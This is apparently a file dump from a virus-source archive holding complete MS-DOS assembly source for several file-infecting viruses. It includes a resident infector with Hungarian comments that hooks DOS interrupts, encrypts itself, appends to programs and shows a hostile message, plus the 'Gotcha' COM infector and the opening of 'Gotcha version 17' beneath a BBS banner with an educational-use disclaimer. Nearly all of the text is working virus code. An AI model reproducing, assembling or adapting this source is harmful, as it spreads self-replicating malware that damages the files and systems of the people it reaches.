int 21h ;!!!!! File megnyitva
mov cs:fszam,ax
mov ds,cs:kkk
xor dx,dx
mov bx,ax
mov cx,0fc00h-(offset memory-offset resid)
mov ah,3fh
int 21h
cmp ax,0fc00h-(offset memory-offset resid)
;!!!!! Beolvasva a program (csak a hossza miatt)
je hosszu ;zarjuk le a file-t
cmp ax,7580
jb hosszu ;tul rovid a file
mov di,ax
mov bx,ds:[1]
cmp word ptr [bx+3],0b950h
;$$$$$$$$$$$$$$$$$$$$$$$$$ FUCK OFF TASM,MASM $$$$$$$$$$$$$$$$$$$$$$$$$$$
je hosszu
push di
mov cx,(offset memory-offset resid)
mov si,offset resid
push ds
pop es
push cs
pop ds
inc byte ptr ds:[offset jhg1 +2]
mov ax,es:[0]
mov eltarol,ax
mov al,es:[2]
mov eltarol2,al
rep movsw ;!!!!! Atmasolva (hehe)
mov al,byte ptr ds:[offset jhg1 +2]
pop di
add di,(offset begin-offset resid)
mov cx,offset memory - offset begin ;#### coding ####
jhga: xor byte ptr es:[di],al
inc di
loop jhga
sub di,(offset memory - offset resid)
push di ;Az ugrasi hely
mov bx,fszam
mov cx,offset memory - offset begin
mov dx,di
push es
pop ds
mov ah,40h
int 21h
pop di
cmp ax,offset memory - offset begin
je ghj1
hosszu: jmp zardle
ghj1: ;!!!!! Kiirva a vege
mov byte ptr ds:[0],0e9h
sub di,3
mov ds:[1],di
mov bx,cs:fszam
xor cx,cx
xor dx,dx
mov ax,4200h
push bx
int 21h
pop bx
mov cx,3
xor dx,dx
mov ah,40h
int 21h
zardle: mov bx,cs:fszam
mov ah,3eh
int 21h ;!!!!! File lezarva
push cs
pop es
mov di,offset memory
mov ds,cs:kds
mov dx,cs:kdx
mov ah,56h
int 21h ;!!!!! File visszanevezve
mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
mov ax,4301h
mov cx,cs:atr
int 21h ;!!!!! attr visszaall
memoff: mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
push cs
pop ds
mov es,cs:kkk
mov ah,49h
int 21h ;!!!!! Memoria visszaalt
ret
it241 dw 0
it242 dw 0
attrflag db 0
elorutin: mov cs:attrflag,0
xor ax,ax
mov ds,ax
mov ax,ds:[90h]
mov cs:it241,ax
mov ax,ds:[92h]
mov cs:it242,ax
mov ds:[90h],offset it24
mov ds:[92h],cs
ret
utorutin: xor ax,ax
mov ds,ax
mov ax,cs:it241
mov ds:[90h],ax
mov ax,cs:it242
mov ds:[92h],ax
ret
it24: mov cs:attrflag,1
xor al,al
iret
vanesik db 0
irq: cli
push ds
push es
push ax
push bx
push cx
push dx
push si
push di
cmp cs:counter,0
je sabad
dec cs:counter
jne sabad
xor ax,ax
mov ds,ax
mov ax,ds:[84h]
mov cs:int211,ax
mov ax,ds:[86h]
mov cs:int212,ax
mov ds:[84h],offset szaporodas
mov ds:[86h],cs
sabad: cmp cs:vanesik,0
je keress
call idovan
jmp jumper
keress: call ruut
jumper: pop di
pop si
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
iret
idovan: xor ah,ah
int 1ah
and dx,suruseg
jne rutyi
call action
rutyi: ret
ruut: mov ax,0b800h
mov es,ax
mov di,cs:did
mov cx,512
cld
poke: jcxz huy
mov al,'E'
repnz scasb
jz talalt
huy: cmp di,4095
jb kisebb
mov cs:did,0
ret
kisebb: add cs:did,512
ret
did dw 0
talalt: test di,1
jz poke
mov dl,es:[di+1]
mov dh,es:[di+3]
or dx,2020h
cmp dx,6973h ;'is'
jne poke
mov bl,es:[di+5]
or bl,20h
cmp bl,'k'
jne poke
mov cs:vanesik,1
jmp huy
action: mov ax,cs
mov ds,ax
mov es,ax
mov vanesik,0
mov pontszam,1
mov si,offset zizi
mov di,offset novi
cld
mov cx,6
rep movsw
call zoldseg
jammed: mov ax,3
int 10h
cmp counterr,atvar
jne fdr
push cs
pop es
lea bx,mess
mov ax,1301h
mov bx,1
xor dx,dx
mov cx,offset drt-offset mess
int 10h
fdr: ret
counterr dw 0
zoldseg: cli
mov di,offset memory
xor ax,ax
cld
mov cx,200*3
rep stosw
mov ah,0c0h
mov si,3333h
int 15h
cmp si,3333h
mov ax,xtvar
je xt
mov ax,atvar
xt: mov counterr,ax
mov ax,3502h
int 21h
cmp bx,0e9eh
jne ibm
call init1
mov pontm,100
mov port,22h
jmp entry
ibm: ;Ibm bulik
mov pontm,200
mov al,70h
mov port,60h ;%
mov ah,15
int 10h
cmp al,7
jne cga
call init3
jmp entry
cga: call init2
jmp entry
port dw 22h
pontm dw 100
init1: mov ax,200h
mov es,ax
xor di,di
mov cx,4000h
cld
xor ax,ax
rep stosw
mov plotdw,offset plot
mov unplotdw,offset unplot
ret
init2: mov ax,0b800h
mov es,ax
mov ax,6
int 10h
mov plotdw,offset plotcga
mov unplotdw,offset unplotcga
ret
init3: mov ax,0b000h
mov es,ax
call prog
mov plotdw,offset plotherc
mov unplotdw,offset unplotcga
ret
prog: mov dx,3bfh
mov al,3
out dx,al
mov al,28h
mov dx,3b8h
out dx,al
mov ah,0
mov cx,12
lea bx,ports
lopi1: mov dx,03b4h
mov al,ah
out dx,al
inc ah
mov dx,03b5h
mov al,[bx]
out dx,al
inc bx
loop lopi1
mov dx,3bfh
mov al,3
out dx,al
mov dx,3b8h
mov al,0ah
out dx,al
xor di,di
mov cx,4000h
xor ax,ax
cld
rep stosw
ret
ports db 35h,2dh,2eh,7,5bh,2,57h,57h,2,3,0,0
;**************************** Forgatorutin ************************************
even
sina dw 0
cosa dw 0 ;si-t meghagyja
sinb dw 0
cosb dw 0
pontszam dw 1
transzform: ;be: di=X, bx=Y, cx=Z, SINA,COSA,SINB,COSB
; add bx,ytol ;ez itt jolesz
shl di,1
shl bx,1 ;X es Y elokeszitese a szorzashoz
mov ax,di
imul cosa
mov bp,dx
mov ax,bx
imul sina
add bp,dx ; bp=X' = cosa*X + sina*Y
mov ax,bx
imul cosa
mov bx,dx
mov ax,di
imul sina
sub bx,dx ; bx=Y' = cosa*X - sina*Y
shl bp,1
shl cx,1 ;X' es Z elokeszitese
mov ax,bp
imul cosb
mov di,dx
mov ax,cx
imul sinb
sub di,dx ; di=X'' = cosb*X' - sinb*Z
mov cx,di
mov ax,bx
ret
comment @
mov ax,cx
imul cosb
mov cx,dx
mov ax,bp
imul sinb
add cx,dx ; cx=Z'' = cosb*Z = sinb*X'
; out: di=X'' bx=Y'' cx=Z''
mov dx,keptav
;****************************** PERSPEKTIVA **********************************
mov ax,di
shl ax,1
imul tavol
mov cx,dx
mov ax,bx
shl ax,1
imul tavol
mov ax,dx
ret ; ki : CX=X' AX=Y'
@
plotherc: ; al=y cx=x
xor ah,ah
mov dx,ax
shr dx,1
add ax,dx
mov dx,cx
mov cl,al
and cl,3
shr ax,1
shr al,1
mov di,2000h
shl di,cl
mov cl,90
mul cl
add di,ax
mov ax,dx
mov cx,dx
jmp ezisi
plotcga: xor di,di
shr ax,1
jnc tryp
mov di,2000h
tryp: mov dl,80
mul dl
add di,ax
mov ax,cx
ezisi: shr ax,1
shr ax,1
shr ax,1
add di,ax
and cl,7
mov al,128
shr al,cl
or es:[di],al
jmp ezis1
unplotcga: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di],al
ret
plot: ;AL = y koord. cx = x koord.
mov dl,160
mul dl
mov di,ax
mov ax,cx
shr ax,1
shr ax,1
add di,ax
and di,-2
and cl,7
mov al,128
shr al,cl
or es:[di+egy],al
ezis1: mov [bx],al
inc bx
mov [bx],di
add bx,2
ret
unplot: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di+egy],al
ret
kezdfazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
ck1: push cx
lodsw
mov cx,ax
shl cx,1
add cx,320
lodsw
add si,2
add ax,50
call word ptr [plotdw]
pop cx
loop ck1
ret
indy db 0
fazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
mov indy,1
ck12: push cx
call word ptr [unplotdw]
push bx
lodsw
mov di,ax
lodsw
mov bx,ax
lodsw
mov cx,ax
call transzform
pop bx
add ax,50
mov di,bxpo
add al,[di]
shl cx,1
add cx,bxpo2
cmp indy,0
je ruty
mov indy,0
cmp karal2,0
jne ruty
push cx
push ax
inc cx
call word ptr [plotdw]
pop ax
pop cx
sub bx,3
ruty: call word ptr [plotdw]
pop cx
loop ck12
ret
novpont: mov ax,pontm
cmp pontszam,ax
je trew
mov cx,pontm
sub cx,pontszam
mov ch,cl
shR cx,1
shr cx,1
yut: loop yut
inc pontszam
ret
trew: call movie
mov bx,bxpo
cmp bx,offset patt
je valto
cmp bx,offset patt+29
je valto
iuy: add bx,novi
mov bxpo,bx
ret
valto: neg novi
jmp iuy
novi dw -1
bxpo dw offset patt
bxpo2 dw 320
novi2 dw 4
karal dw 300
karal2 dw 600
zizi dw -1,offset patt,320,4,300,600
movie: cmp karal,0
je jesty
dec karal
ret
jesty: cmp karal2,0
je jesty2
dec karal2
jesty2: mov bx,bxpo2
cmp bx,100
je valto2
cmp bx,540
je valto2
iuy2: add bx,novi2
mov bxpo2,bx
ret
valto2: neg novi2
jmp iuy2
elokesz: call novpont
mov bl,szogx
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sina,ax
mov ax,costabl[bx]
mov cosa,ax
mov bl,szogy
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sinb,ax
mov ax,costabl[bx]
mov cosb,ax
mov al,szogxvalt
add szogx,al
mov al,szogyvalt
add szogy,al
ret
even
szogx db 0
szogy db 0
szogxvalt db 2
szogyvalt db 5
tavol dw 32767
phase: call elokesz
call fazisrajz
ret
entry: call kezdfazisrajz
rajta1: call phase
cmp pontm,100
je apc
cmp byte ptr ds:[offset ruut +2],0b8h
je ccggaa
mov cx,counterr
mov dx,3bah
qaz1: in al,dx
and al,1
jnz qaz1
qaz2: in al,dx
and al,1
jz qaz2
loop qaz1
jmp apc
ccggaa: mov dx,3dah
qaz3: in al,dx
and al,8
jnz qaz3
qaz4: in al,dx
and al,8
jz qaz4
apc: mov dx,port
in al,dx
and al,1
jz rajta1
ret
even
plotdw dw 0
unplotdw dw 0
sintabl dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602, 6393
dw 7179, 7962, 8739, 9512, 10278, 11039, 11793, 12539, 13279
dw 14010, 14732, 15446, 16151, 16846, 17530, 18204, 18868, 19519
dw 20159, 20787, 21403, 22005, 22594, 23170, 23731, 24279, 24811
dw 25329, 25832, 26319, 26790, 27245, 27683, 28105, 28510, 28898
dw 29268, 29621, 29956, 30273, 30571, 30852, 31113, 31356, 31580
dw 31785, 31971, 32137, 32285, 32412, 32521, 32609, 32678, 32728
dw 32757, 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571, 30273
dw 29956, 29621, 29268, 28898, 28510, 28105, 27683, 27245, 26790
dw 26319, 25832, 25329, 24811, 24279, 23731, 23170, 22594, 22005
dw 21403, 20787, 20159, 19519, 18868, 18204, 17530, 16846, 16151
dw 15446, 14732, 14010, 13279, 12539, 11793, 11039, 10278, 9512
dw 8739, 7962, 7179, 6393, 5602, 4808, 4011, 3212, 2410
dw 1608, 804, 0, -804, -1608, -2410, -3212, -4011, -4808
dw -5602, -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539,-13279,-14010,-14732,-15446,-16151,-16846,-17530,-18204
dw -18868,-19519,-20159,-20787,-21403,-22005,-22594,-23170,-23731
dw -24279,-24811,-25329,-25832,-26319,-26790,-27245,-27683,-28105
dw -28510,-28898,-29268,-29621,-29956,-30273,-30571,-30852,-31113
dw -31356,-31580,-31785,-31971,-32137,-32285,-32412,-32521,-32609
dw -32678,-32728,-32757,-32767,-32757,-32728,-32678,-32609,-32521
dw -32412,-32285,-32137,-31971,-31785,-31580,-31356,-31113,-30852
dw -30571,-30273,-29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245,-26790,-26319,-25832,-25329,-24811,-24279,-23731,-23170
dw -22594,-22005,-21403,-20787,-20159,-19519,-18868,-18204,-17530
dw -16846,-16151,-15446,-14732,-14010,-13279,-12539,-11793,-11039
dw -10278, -9512, -8739, -7962, -7179, -6393, -5602, -4808, -4011
dw -3212, -2410, -1608, -804
costabl dw 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571
dw 30273, 29956, 29621, 29268, 28898, 28510, 28105, 27683
dw 27245, 26790, 26319, 25832, 25329, 24811, 24279, 23731
dw 23170, 22594, 22005, 21403, 20787, 20159, 19519, 18868
dw 18204, 17530, 16846, 16151, 15446, 14732, 14010, 13279
dw 12539, 11793, 11039, 10278, 9512, 8739, 7962, 7179
dw 6393, 5602, 4808, 4011, 3212, 2410, 1608, 804
dw 0, -804, -1608, -2410, -3212, -4011, -4808, -5602
dw -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539, -13279,-14010,-14732,-15446,-16151,-16846,-17530
dw -18204, -18868,-19519,-20159,-20787,-21403,-22005,-22594
dw -23170, -23731,-24279,-24811,-25329,-25832,-26319,-26790
dw -27245, -27683,-28105,-28510,-28898,-29268,-29621,-29956
dw -30273, -30571,-30852,-31113,-31356,-31580,-31785,-31971
dw -32137, -32285,-32412,-32521,-32609,-32678,-32728,-32757
dw -32767, -32757,-32728,-32678,-32609,-32521,-32412,-32285
dw -32137, -31971,-31785,-31580,-31356,-31113,-30852,-30571
dw -30273, -29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245, -26790,-26319,-25832,-25329,-24811,-24279,-23731
dw -23170, -22594,-22005,-21403,-20787,-20159,-19519,-18868
dw -18204, -17530,-16846,-16151,-15446,-14732,-14010,-13279
dw -12539, -11793,-11039,-10278, -9512, -8739, -7962, -7179
dw -6393, -5602, -4808, -4011, -3212, -2410, -1608, -804
dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602
dw 6393, 7179, 7962, 8739, 9512, 10278, 11039, 11793
dw 12539, 13279, 14010, 14732, 15446, 16151, 16846, 17530
dw 18204, 18868, 19519, 20159, 20787, 21403, 22005, 22594
dw 23170, 23731, 24279, 24811, 25329, 25832, 26319, 26790
dw 27245, 27683, 28105, 28510, 28898, 29268, 29621, 29956
dw 30273, 30571, 30852, 31113, 31356, 31580, 31785, 31971
dw 32137, 32285, 32412, 32521, 32609, 32678, 32728, 32757
gombdata:
DW 44, 3, 22, 29, 6, 40, 7, 9, 48,-14, 12, 46
DW -33, 15, 33,-44, 18, 14,-44, 21, -7,-35, 24,-25
DW -19, 26,-37, 0, 29,-40, 17, 31,-34, 29, 34,-21
DW 33, 36, -5, 30, 38, 9, 20, 40, 20, 8, 42, 25
DW -3, 43, 23,-12, 45, 17,-16, 46, 8,-15, 47, 0
DW -11, 48, -5, -5, 49, -7, 0, 49, -6, 0, 49, -2
DW 0, 49, 0, -2, 49, 0, -6, 49, 0, -7, 49, -5
DW -5, 48,-11, 0, 47,-15, 8, 46,-16, 17, 45,-12
DW 23, 43, -3, 25, 42, 8, 20, 40, 20, 9, 38, 30
DW -5, 36, 33,-21, 34, 29,-34, 31, 17,-40, 29, 0
DW -37,26,-19,-25,24,-35,-7,21,-44,14,18,-44
DW 33,15,-33,46,12,-14,48,9,7,40,6,29
DW 22,3,44,0,0,49,-22,-3,44,-40,-6,29
DW -48,-9,7,-46,-12,-14,-33,-15,-33,-14,-18,-44
DW 7,-21,-44,25,-24,-35,37,-26,-19,40,-29,0
DW 34,-31,17,21,-34,29,5,-36,33,-9,-38,30
DW -20,-40,20,-25,-42,8,-23,-43,-3,-17,-45,-12
DW -8,-46,-16,0,-47,-15,5,-48,-11,7,-49,-5
DW 6,-49,0,2,-49,0,0,-49,0,0,-49,-2
DW 0,-49,-6,5,-49,-7,11,-48,-5,15,-47,0
DW 16,-46,8,12,-45,17,3,-43,23,-8,-42,25
DW -20,-40,20,-30,-38,9,-33,-36,-5,-29,-34,-21
DW -17,-31,-34,0,-29,-40,19,-26,-37,35,-24,-25
DW 44,-21,-7,44,-18,14,33,-15,33,14,-12,46
DW -7,-9,48,-29,-6,40,-44,-3,22,-49,0,0
DW -44,3,-22,-29,6,-40,-7,9,-48,14,12,-46
DW 33,15,-33,44,18,-14,44,21,7,35,24,25
DW 19,26,37,0,29,40,-17,31,34,-29,34,21
DW -33,36,5,-30,38,-9,-20,40,-20,-8,42,-25
DW 3,43,-23,12,45,-17,16,46,-8,15,47,0
DW 11,48,5,5,49,7,0,49,6,0,49,2
DW 0,49,0,2,49,0,6,49,0,7,49,5
DW 5,48,11,0,47,15,-8,46,16,-17,45,12
DW -23,43,3,-25,42,-8,-20,40,-20,-9,38,-30
DW 5,36,-33,21,34,-29,34,31,-17,40,29,0
DW 37,26,19,25,24,35,7,21,44,-14,18,44
DW -33,15,33,-46,12,14,-48,9,-7,-40,6,-29
DW -22,3,-44,0,0,-49,22,-3,-44,40,-6,-29
DW 48,-9,-7,46,-12,14,33,-15,33,14,-18,44
DW -7,-21,44,-25,-24,35,-37,-26,19,-40,-29,0
DW -34,-31,-17,-21,-34,-29,-5,-36,-33,9,-38,-30
DW 20,-40,-20,25,-42,-8,23,-43,3,17,-45,12
DW 8,-46,16,0,-47,15,-5,-48,11,-7,-49,5
DW -6,-49,0,-2,-49,0,0,-49,0,0,-49,2
DW 0,-49,6,-5,-49,7,-11,-48,5,-15,-47,0
DW -16,-46,-8,-12,-45,-17,-3,-43,-23,8,-42,-25
DW 20,-40,-20,30,-38,-9,33,-36,5,29,-34,21
DW 17,-31,34,0,-29,40,-19,-26,37,-35,-24,25
DW -44,-21,7,-44,-18,-14,-33,-15,-33,-14,-12,-46
DW 7,-9,-48,29,-6,-40,44,-3,-22,49,0,0
patt: DB 0, 0, 0, 0, 0, 1, 1, 2, 4, 5, 7, 9,11,14,17,20,23,27
db 31,35,40,45,50,56,61,67,73,80,86,93
mess db 'HARD HIT & HEAVY HATE the HUMANS !!'
db ' [ H.H.& H.H. the H. ] '
drt dw 5 dup (0)
memory:
CODE ENDS
END START
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/G-Index/Virus.MSDOS.Unknown.gotcha-e.asm
+397
View File
@@ -0,0 +1,397 @@
;****************************************************************************
;* stripped COM-versie
;* met signature's
;*
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature
FILELEN equ eind - begin
RESPAR equ (FILELEN/16) + 17
BUFLEN equ 08h
VERSION equ 4
.RADIX 16
;****************************************************************************
;* Opstart programma
;****************************************************************************
begin: xor bx,bx
mov cl,07h
crloop: call crypt
loop crloop
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup (?)
oi21 dw ?,?
oldlen dw ?
handle dw ?
sign db 0
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax,4B00h
jne ni_verder
push es
push ds
push ax
push bx
push cx
push dx
call attach
mov cl,[sign]
call crypt
inc cl
and cl,07h
mov [sign],cl
call crypt
pop dx
pop cx
pop bx
pop ax
pop ds
pop es
exit: popf
jmp dword ptr cs:[oi21] ;naar oude int-handler
ni_verder: cmp ax,0DADAh
jne exit
mov ax,0A500h+VERSION
popf
iret
;****************************************************************************
;* plakt programma aan file (ASCIIZ DS:DX)
;****************************************************************************
attach: cld
mov ax,3D02h ;open de file
int 21
jc finnish
push cs
pop ds
mov [handle],ax ;bewaar file-handle
call eindptr ;bepaal lengte
jc finnish
mov [oldlen],ax
sub ax,SIGNLEN ;pointer naar eind - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov
jc finnish
mov cx,SIGNLEN ;lees de laatse bytes
mov dx,offset buffer
call flread
jc finnish
verder3: push cs ;vergelijk signature met buffer
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
or cx,cx
jz finnish
call beginptr ;lees begin van file
mov cx,BUFLEN
mov dx,offset buffer
call flread
jc finnish
cmp word ptr [buffer],5A4Dh
jz finnish
call writeprog ;schrijf programma naar file
jc finnish
mov ax,[oldlen] ;bereken call-adres
add ax,offset entry
sub ax,0103
mov byte ptr [buffer],0E9h
mov word ptr [buffer+1],ax
call beginptr ;pas begin van file aan
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
jc finnish
finnish: mov bx,[handle] ;sluit de file
mov ah,3Eh
int 21
ret
;****************************************************************************
;* Crypt een signature
;****************************************************************************
crypt: push cx
mov al,14h
mul cl
add ax,offset virsig
mov si,ax
mov di,ax
push cs
push cs
pop ds
pop es
mov cx,0Ah
cryploop: lodsw
xor ax,0FFFFh
stosw
loop cryploop
pop cx
ret
;****************************************************************************
;* Schrijf programma naar file
;****************************************************************************
writeprog: call eindptr
mov cx,FILELEN
mov dx,offset begin
call flwrite
ret
;****************************************************************************
;* Subroutines voor file-pointer
;****************************************************************************
beginptr: mov al,00h ;naar begin van de file
xor cx,cx
xor dx,dx
jmp ptrmov
eindptr: mov al,02h ;naar eind van de file
xor cx,cx
xor dx,dx
; jmp ptrmov
ptrmov: mov ah,42h
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Subroutines voor lezen/schrijven
;****************************************************************************
flwrite: push cs
pop ds
mov ah,40h
mov bx,[handle]
int 21
ret
flread: push cs
pop ds
mov ah,3Fh
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Activering vanuit file
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX is begin programma - 100
cld
mov ax,bx ;copieer oude begin terug
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb
mov ax,0100h
push ax
entcall: mov ax,0DADAh ;kijk of al geinstalleerd
int 21h
cmp ah,0A5h
je entstop
call install ;installeer het programma
entstop: ret
;****************************************************************************
;* Installatie in het geheugen
;****************************************************************************
install: push ds
push es
xor ax,ax ;haal oude vector
mov es,ax
mov cx,word ptr es:0084h
mov dx,word ptr es:0086h
mov [bx+offset oi21],cx
mov [bx+offset oi21+2],dx
mov ax,ds ;pas geheugen-grootte aan
dec ax
mov es,ax
cmp byte ptr es:[0000h],5Ah
jnz cancel
mov ax,es:[0003h]
sub ax,RESPAR
jb cancel
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR
mov es,es:[0012h] ;copieer programma naar top
mov ax,bx
add ax,0100
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ;zet nieuwe vector
push es
pop ds
mov ax,2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Tekst en Signature
;****************************************************************************
virsig:
;SYSLOCK Virus
db 0D1h, 0E9h, 8Ah, 0E1h
db 8Ah, 0C1h, 33h, 06h
db 14h, 00h, 31h, 04h
db 46h, 46h, 0E2h, 0F2h
db 5Eh, 59h, 58h, 0C3h
;Sylvia Virus
db 8Dh, 36h, 03h, 01h
db 33h, 0C9h, 33h, 0C0h
db 0ACh, 3Ch, 1Ah, 74h
db 04h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;DATACRIME IIb Virus
db 2Eh, 8Ah, 07h, 32h
db 0C2h, 0D0h, 0CAh, 2Eh
db 88h, 07h, 43h, 0E2h
db 0F3h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Yankee-Go-Home Virus (Enigma)
db 0D8h, 0Eh, 1Fh, 0BEh
db 37h, 08h, 81h, 0EEh
db 03h, 01h, 03h, 0F3h
db 89h, 04h, 0BEh, 39h
db 08h, 81h, 0EEh, 03h
;Slowdown Virus
db 0DEh, 90h, 90h, 81h
db 0C6h, 1Bh, 00h, 0B9h
db 90h, 06h, 2Eh, 80h
db 34h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Scotts Valley Virus
db 5Eh, 8Bh, 0DEh, 90h
db 90h, 81h, 0C6h, 32h
db 00h, 0B9h, 12h, 08h
db 2Eh, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Tiny-2A related Virus
db 0A5h, 8Eh, 0C1h, 0A6h
db 74h, 12h, 4Eh, 4Fh
db 0F3h, 0A5h, 8Eh, 0C1h
db 93h, 91h, 91h, 26h
db 87h, 85h, 0E0h, 0FEh
;DATACRIME 1280 Virus
db 8Bh, 36h, 01h, 01h
db 83h, 0EEh, 03h, 8Bh
db 0C6h, 3Dh, 00h, 00h
db 75h, 03h, 0E9h, 02h
db 01h, 90h, 90h, 90h
;;July13 Virus
; db 0A0h, 12h, 00h, 34h
; db 90h, 0BEh, 12h, 00h
; db 0B9h, 0B1h, 04h, 2Eh
; db 30h, 04h, 46h, 0E2h
; db 0FAh, 90h, 90h, 90h
;;XA1 Virus (Tannenbaum)
;virsig: db 0FAh, 8Bh, 0ECh, 58h
; db 32h, 0C0h, 89h, 46h
; db 02h, 81h, 46h, 00h
; db 28h, 00h, 90h, 90h
; db 90h, 90h, 90h, 90h
;;Twelve Tricks Trojan Dropper
; db 0BEh, 64h, 02h, 31h
; db 94h, 42h, 01h, 0D1h
; db 0C2h, 4Eh, 79h, 0F7h
; db 90h, 90h, 90h, 90h
; db 90h, 90h, 90h, 90h
signature: db 'GOTCHA!',0
signend:
eind:
cseg ends
end begin

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/G-Index/Virus.MSDOS.Unknown.gotcha17.asm
+503
View File
@@ -0,0 +1,503 @@
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;****************************************************************************
;* Gotcha version 17
;*
;* Compile with MASM 4.0
;* (other assemblers will probably not produce the same result)
;*
;* Disclaimer:
;* This file is only for educational purposes. The author takes no
;* responsibility for anything anyone does with this file. Do not
;* modify this file!
;****************************************************************************
.RADIX 16
cseg segment
assume cs:cseg,ds:cseg,es:nothing
VERSION equ 17d
FILELEN equ end - start
RESPAR equ (FILELEN/16d) + 18d
BUFLEN equ 18
ENVLEN equ signature- envstring
COMSIGN equ 0
EXESIGN equ 1
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
org 0100
begin: db 0E9, BUFLEN+1, 0 ;jump to virus entry
;****************************************************************************
;* Data
;****************************************************************************
org 0103
start:
buffer db 0CDh, 20 ;original code
db (BUFLEN-2) dup (?)
comexe db COMSIGN ;dummy program is a COM program
;****************************************************************************
;* Install the virus
;****************************************************************************
call start2
start2: pop si
sub si,(BUFLEN+4) ;si = begin virus
mov di,0100
cld
cmp byte ptr cs:[si+BUFLEN],COMSIGN
jz entryC
entryE: mov ax,ds ;calculate CS
add ax,10
add ax,cs:[si+16]
push ax ;push new CS on stack
push cs:[si+14] ;push new IP on stack
jmp short entcheck
entryC: push cs ;push new CS on stack
push di ;push new IP on stack
push di
push si
movsw ;restore old file-begin
movsb
pop si
pop di
entcheck: mov ax,0DADA ;already installed?
int 21
cmp ah,0A5
je entstop
mov ax,3000 ;test DOS version >= 3.1?
int 21
xchg ah,al
cmp ax,030A
jb entstop
push ds
push es
mov ax,ds ;adjust memory-size
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5A
jnz cancel
mov ax,ds:[0003]
sub ax,low RESPAR
jb cancel
mov ds:[0003],ax
